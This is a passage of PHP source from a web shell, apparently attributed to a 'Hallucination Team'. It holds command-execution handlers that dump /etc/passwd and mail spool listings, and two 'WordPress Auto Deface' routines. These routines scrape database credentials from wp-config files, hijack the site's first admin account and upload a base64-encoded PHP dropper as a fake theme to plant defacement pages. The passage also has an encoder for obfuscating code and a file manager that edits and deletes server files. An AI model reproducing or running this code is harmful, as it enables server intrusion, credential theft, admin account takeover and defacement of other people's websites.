4126. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
4127. echo "</textarea><br>";
4128. }
4129. if ($_POST['systuser']) {
4130. echo"<textarea class='inputzbut' cols='65' rows='15'>";
4131. echo system("ls /var/mail");
4132. echo "</textarea><br>";
4133. }
4134. if ($_POST['passthuser']) {
4135. echo"<textarea class='inputzbut' cols='65' rows='15'>";
4136. echo passthru("ls /var/mail");
4137. echo "</textarea><br>";
4138. }
4139. if ($_POST['exuser']) {
4140. echo"<textarea class='inputzbut' cols='65' rows='15'>";
4141. echo exec("ls /var/mail");
4142. echo "</textarea><br>";
4143. }
4144. if ($_POST['shexuser']) {
4145. echo"<textarea class='inputzbut' cols='65' rows='15'>";
4146. echo shell_exec("ls /var/mail");
4147. echo "</textarea><br>";
4148. }
4149. if($_POST['syst'])
4150. {
4151. echo"<textarea class='inputz' cols='65' rows='15'>";
4152. echo system("cat /etc/passwd");
4153. echo"</textarea><br><br><b></b><br>";
4154. }
4155. if($_POST['passth'])
4156. {
4157. echo"<textarea class='inputz' cols='65' rows='15'>";
4158. echo passthru("cat /etc/passwd");
4159. echo"</textarea><br><br><b></b><br>";
4160. }
4161. if($_POST['ex'])
4162. {
4163. echo"<textarea class='inputz' cols='65' rows='15'>";
4164. echo exec("cat /etc/passwd");
4165. echo"</textarea><br><br><b></b><br>";
4166. }
4167. if($_POST['shex'])
4168. {
4169. echo"<textarea class='inputz' cols='65' rows='15'>";
4170. echo shell_exec("cat /etc/passwd");
4171. echo"</textarea><br><br><b></b><br>";
4172. }
4173. echo '<center>';
4174. if($_POST['melex'])
4175. {
4176. echo"<textarea class='inputz' cols='65' rows='15'>";
4177. for($uid=0;$uid<60000;$uid++){
4178. $ara = posix_getpwuid($uid);
4179. if (!empty($ara)) {
4180. while (list ($key, $val) = each($ara)){
4181. print "$val:";
4182. }
4183. print "\n";
4184. }
4185. }
4186. echo"</textarea><br><br>";
4187. }
4188. //
4189.  
4190. //
4191. } elseif($_GET['do'] == 'auto_dwp') {
4192.     if($_POST['auto_deface_wp']) {
4193.         function anucurl($sites) {
4194.             $ch = curl_init($sites);
4195.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4196.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4197.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4198.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
4199.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4200.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4201.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4202.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4203.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4204.             $data = curl_exec($ch);
4205.                   curl_close($ch);
4206.             return $data;
4207.         }
4208.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
4209.             $post = array(
4210.                    "log" => "$userr",
4211.                    "pwd" => "$pass",
4212.                    "rememberme" => "forever",
4213.                    "wp-submit" => "$wp_submit",
4214.                    "redirect_to" => "$web",
4215.                    "testcookie" => "1",
4216.                    );
4217.             $ch = curl_init($cek);
4218.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4219.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4220.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4221.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4222.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4223.                   curl_setopt($ch, CURLOPT_POST, 1);
4224.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
4225.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4226.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4227.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4228.             $data = curl_exec($ch);
4229.                   curl_close($ch);
4230.             return $data;
4231.         }
4232.         $scan = $_POST['link_config'];
4233.         $link_config = scandir($scan);
4234.         $script = htmlspecialchars($_POST['script']);
4235.         $user = "Hallucination";
4236.         $pass = "Hallucination";
4237.         $passx = md5($pass);
4238.         foreach($link_config as $dir_config) {
4239.             if(!is_file("$scan/$dir_config")) continue;
4240.             $config = file_get_contents("$scan/$dir_config");
4241.             if(preg_match("/WordPress/", $config)) {
4242.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
4243.                 $dbuser = ambilkata($config,"DB_USER', '","'");
4244.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
4245.                 $dbname = ambilkata($config,"DB_NAME', '","'");
4246.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
4247.                 $prefix = $dbprefix."users";
4248.                 $option = $dbprefix."options";
4249.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
4250.                 $db = mysql_select_db($dbname);
4251.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
4252.                 $result = mysql_fetch_array($q);
4253.                 $id = $result[ID];
4254.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
4255.                 $result2 = mysql_fetch_array($q2);
4256.                 $target = $result2[option_value];
4257.                 if($target == '') {                
4258.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
4259.                 } else {
4260.                     echo "[+] $target <br>";
4261.                 }
4262.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
4263.                 if(!$conn OR !$db OR !$update) {
4264.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
4265.                     mysql_close($conn);
4266.                 } else {
4267.                     $site = "$target/wp-login.php";
4268.                     $site2 = "$target/wp-admin/theme-install.php?upload";
4269.                     $b1 = anucurl($site2);
4270.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
4271.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
4272.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
4273.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
4274.                     $www = "m.php";
4275.                     $fp5 = fopen($www,"w");
4276.                     fputs($fp5,$upload3);
4277.                     $post2 = array(
4278.                             "_wpnonce" => "$anu2",
4279.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
4280.                             "themezip" => "@$www",
4281.                             "install-theme-submit" => "Install Now",
4282.                             );
4283.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
4284.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4285.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4286.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4287.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4288.                           curl_setopt($ch, CURLOPT_POST, 1);
4289.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
4290.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4291.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4292.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4293.                     $data3 = curl_exec($ch);
4294.                           curl_close($ch);
4295.                     $y = date("Y");
4296.                     $m = date("m");
4297.                     $namafile = "id.php";
4298.                     $fpi = fopen($namafile,"w");
4299.                     fputs($fpi,$script);
4300.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
4301.                            curl_setopt($ch6, CURLOPT_POST, true);
4302.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
4303.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
4304.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
4305.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
4306.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
4307.                     $postResult = curl_exec($ch6);
4308.                            curl_close($ch6);
4309.                     $as = "$target/k.php";
4310.                     $bs = anucurl($as);
4311.                     if(preg_match("#$script#is", $bs)) {
4312.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
4313.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
4314.                         } else {
4315.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
4316.                         echo "[!!] coba aja manual: <br>";
4317.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
4318.                         echo "[+] username: <font color=lime>$user</font><br>";
4319.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
4320.                         }
4321.                     mysql_close($conn);
4322.                 }
4323.             }
4324.         }
4325.     } else {
4326.         echo "<center><h1>WordPress Auto Deface</h1>
4327.         <form method='post'>
4328.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
4329.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Hallucination Team' required><br>
4330.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
4331.         </form>
4332.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
4333.         </center>";
4334.     }
4335. } elseif($_GET['do'] == 'decode') {
4336. {$text = $_POST['code'];
4337.     ?> 
4338.     <center><br><br><b>Decode & Encode Script</b><br><br>
4339.     <form method="post"><br><br><br>
4340.     <textarea class='inputz' cols=20 rows=5 name="code"></textarea><br><br>
4341.     <select class='inputz' size="1" name="ope">
4342.     <option value="base64">Base64</option>
4343.     <option value="gzinflate">str_rot13 - gzinflate - base64</option>
4344.     <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
4345.     </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
4346.     <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
4347.     </form>
4348. <?php
4349. $submit = $_POST['submit'];
4350. if (isset($submit)){
4351. $op = $_POST["ope"];
4352. switch ($op) {case 'base64': $codi=base64_encode($text);
4353. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
4354. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
4355. break;default:break;}}
4356.  
4357. $submit = $_POST['submits'];
4358. if (isset($submit)){
4359. $op = $_POST["ope"];
4360. switch ($op) {case 'base64': $codi=base64_decode($text);
4361. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
4362. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
4363. break;default:break;}}
4364.  
4365. echo '<textarea cols=10 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
4366.  
4367. }
4368. } elseif($_GET['do'] == 'auto_dwp2') {
4369.     if($_POST['auto_deface_wp']) {
4370.         function anucurl($sites) {
4371.             $ch = curl_init($sites);
4372.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4373.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4374.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4375.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
4376.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4377.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4378.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4379.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4380.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
4381.             $data = curl_exec($ch);
4382.                   curl_close($ch);
4383.             return $data;
4384.         }
4385.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
4386.             $post = array(
4387.                    "log" => "$userr",
4388.                    "pwd" => "$pass",
4389.                    "rememberme" => "forever",
4390.                    "wp-submit" => "$wp_submit",
4391.                    "redirect_to" => "$web",
4392.                    "testcookie" => "1",
4393.                    );
4394.             $ch = curl_init($cek);
4395.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4396.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4397.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4398.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4399.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4400.                   curl_setopt($ch, CURLOPT_POST, 1);
4401.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
4402.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4403.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4404.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4405.             $data = curl_exec($ch);
4406.                   curl_close($ch);
4407.             return $data;
4408.         }
4409.         $link = explode("\r\n", $_POST['link']);
4410.         $script = htmlspecialchars($_POST['script']);
4411.         $user = "Hallucination";
4412.         $pass = "Hallucination";
4413.         $passx = md5($pass);
4414.         foreach($link as $dir_config) {
4415.             $config = anucurl($dir_config);
4416.             $dbhost = ambilkata($config,"DB_HOST', '","'");
4417.             $dbuser = ambilkata($config,"DB_USER', '","'");
4418.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
4419.             $dbname = ambilkata($config,"DB_NAME', '","'");
4420.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
4421.             $prefix = $dbprefix."users";
4422.             $option = $dbprefix."options";
4423.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
4424.             $db = mysql_select_db($dbname);
4425.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
4426.             $result = mysql_fetch_array($q);
4427.             $id = $result[ID];
4428.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
4429.             $result2 = mysql_fetch_array($q2);
4430.             $target = $result2[option_value];
4431.             if($target == '') {                
4432.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
4433.             } else {
4434.                 echo "[+] $target <br>";
4435.             }
4436.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
4437.             if(!$conn OR !$db OR !$update) {
4438.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
4439.                 mysql_close($conn);
4440.             } else {
4441.                 $site = "$target/wp-login.php";
4442.                 $site2 = "$target/wp-admin/theme-install.php?upload";
4443.                 $b1 = anucurl($site2);
4444.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
4445.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
4446.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
4447.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
4448.                 $www = "m.php";
4449.                 $fp5 = fopen($www,"w");
4450.                 fputs($fp5,$upload3);
4451.                 $post2 = array(
4452.                         "_wpnonce" => "$anu2",
4453.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
4454.                         "themezip" => "@$www",
4455.                         "install-theme-submit" => "Install Now",
4456.                         );
4457.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
4458.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4459.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4460.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4461.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4462.                       curl_setopt($ch, CURLOPT_POST, 1);
4463.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
4464.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4465.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4466.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4467.                 $data3 = curl_exec($ch);
4468.                       curl_close($ch);
4469.                 $y = date("Y");
4470.                 $m = date("m");
4471.                 $namafile = "id.php";
4472.                 $fpi = fopen($namafile,"w");
4473.                 fputs($fpi,$script);
4474.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
4475.                        curl_setopt($ch6, CURLOPT_POST, true);
4476.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
4477.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
4478.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
4479.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
4480.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
4481.                 $postResult = curl_exec($ch6);
4482.                        curl_close($ch6);
4483.                 $as = "$target/k.php";
4484.                 $bs = anucurl($as);
4485.                 if(preg_match("#$script#is", $bs)) {
4486.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
4487.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
4488.                     } else {
4489.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
4490.                     echo "[!!] coba aja manual: <br>";
4491.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
4492.                     echo "[+] username: <font color=lime>$user</font><br>";
4493.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
4494.                     }
4495.                 mysql_close($conn);
4496.             }
4497.         }
4498.     } else {
4499.         echo "<center><h1>WordPress Auto Deface V.2</h1>
4500.         <form method='post'>
4501.         Link Config: <br>
4502.         <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
4503.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By Hallucination Team' required><br>
4504.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
4505.         </form></center>";
4506.     }
4507. } elseif($_GET['act'] == 'newfile') {
4508.     if($_POST['new_save_file']) {
4509.         $newfile = htmlspecialchars($_POST['newfile']);
4510.         $fopen = fopen($newfile, "a+");
4511.         if($fopen) {
4512.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4513.         } else {
4514.             $act = "<font color=red>permission denied</font>";
4515.         }
4516.     }
4517.     echo $act;
4518.     echo "<form method='post'>
4519.     Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4520.     <input type='submit' name='new_save_file' value='Submit'>
4521.     </form>";
4522. } elseif($_GET['act'] == 'newfolder') {
4523.     if($_POST['new_save_folder']) {
4524.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4525.         if(!mkdir($new_folder)) {
4526.             $act = "<font color=red>permission denied</font>";
4527.         } else {
4528.             $act = "<script>window.location='?dir=".$dir."';</script>";
4529.         }
4530.     }
4531.     echo $act;
4532.     echo "<form method='post'>
4533.     Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4534.     <input type='submit' name='new_save_folder' value='Submit'>
4535.     </form>";
4536. } elseif($_GET['act'] == 'rename_dir') {
4537.     if($_POST['dir_rename']) {
4538.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4539.         if($dir_rename) {
4540.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4541.         } else {
4542.             $act = "<font color=red>permission denied</font>";
4543.         }
4544.     echo "".$act."<br>";
4545.     }
4546.     echo "<form method='post'>
4547.     <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4548.     <input type='submit' name='dir_rename' value='rename'>
4549.     </form>";
4550. } elseif($_GET['act'] == 'delete_dir') {
4551.     function Delete($path)
4552. {
4553.     if (is_dir($path) === true)
4554.     {
4555.         $files = array_diff(scandir($path), array('.', '..'));
4556.         foreach ($files as $file)
4557.         {
4558.             Delete(realpath($path) . '/' . $file);
4559.         }
4560.         return rmdir($path);
4561.     }
4562.     else if (is_file($path) === true)
4563.     {
4564.         return unlink($path);
4565.     }
4566.     return false;
4567. }
4568.     $delete_dir = Delete($dir);
4569.     if($delete_dir) {
4570.         $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4571.     } else {
4572.         $act = "<font color=red>could not remove ".basename($dir)."</font>";
4573.     }
4574.     echo $act;
4575. } elseif($_GET['act'] == 'view') {
4576.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4577.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4578. } elseif($_GET['act'] == 'edit') {
4579.     if($_POST['save']) {
4580.         $save = file_put_contents($_GET['file'], $_POST['src']);
4581.         if($save) {
4582.             $act = "<font color=lime>Saved!</font>";
4583.         } else {
4584.             $act = "<font color=red>permission denied</font>";
4585.         }
4586.     echo "".$act."<br>";
4587.     }
4588.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4589.     echo "<form method='post'>
4590.     <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4591.     <input type='submit' value='Save' name='save' style='width: 500px;'>
4592.     </form>";
4593. } elseif($_GET['act'] == 'rename') {
4594.     if($_POST['do_rename']) {
4595.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4596.         if($rename) {
4597.             $act = "<script>window.location='?dir=".$dir."';</script>";
4598.         } else {
4599.             $act = "<font color=red>permission denied</font>";
4600.         }
4601.     echo "".$act."<br>";
4602.     }
4603.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
4604.     echo "<form method='post'>
4605.     <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4606.     <input type='submit' name='do_rename' value='rename'>
4607.     </form>";
4608. } elseif($_GET['act'] == 'delete') {
4609.     $delete = unlink($_GET['file']);
4610.     if($delete) {
4611.         $act = "<script>window.location='?dir=".$dir."';</script>";
4612.     } else {
4613.         $act = "<font color=red>permission denied</font>";
4614.     }
4615.     echo $act;
4616. }else {
4617.     if(is_dir($dir) == true) {
4618.         echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4619.         <tr>
4620.         <th class="th_home"><center>Name</center></th>
4621.         <th class="th_home"><center>Type</center></th>
4622.         <th class="th_home"><center>Size</center></th>
4623.         <th class="th_home"><center>Last Modified</center></th>
4624.         <th class="th_home"><center>Permission</center></th>
4625.         <th class="th_home"><center>Action</center></th>
4626.         </tr>';
4627.         $scandir = scandir($dir);
4628.         foreach($scandir as $dirx) {
4629.             $dtype = filetype("$dir/$dirx");
4630.             $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4631.             if(!is_dir("$dir/$dirx")) continue;
4632.             if($dirx === '..') {
4633.                 $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4634.             } elseif($dirx === '.') {
4635.                 $href = "<a href='?dir=$dir'>$dirx</a>";
4636.             } else {
4637.                 $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4638.             }
4639.             if($dirx === '.' || $dirx === '..') {
4640.                 $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4641.                 } else {
4642.                 $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4643.             }
4644.             echo "<tr>";
4645.             echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4646.             echo "<td class='td_home'><center>$dtype</center></td>";
4647.             echo "<td class='td_home'><center>-</center></th>";
4648.             echo "<td class='td_home'><center>$dtime</center></td>";
4649.             echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4650.             echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
4651.         }
4652.         echo "</tr>";
4653.         foreach($scandir as $file) {
4654.             $ftype = filetype("$dir/$file");
4655.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4656.             $size = filesize("$dir/$file")/1024;
4657.             $size = round($size,3);
4658.             if($size > 1024) {
4659.                 $size = round($size/1024,2). 'MB';
4660.             } else {
4661.                 $size = $size. 'KB';
4662.             }
4663.             if(!is_file("$dir/$file")) continue;
4664.             echo "<tr>";
4665.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4666.             echo "<td class='td_home'><center>$ftype</center></td>";
4667.             echo "<td class='td_home'><center>$size</center></td>";
4668.             echo "<td class='td_home'><center>$ftime</center></td>";
4669.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4670.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
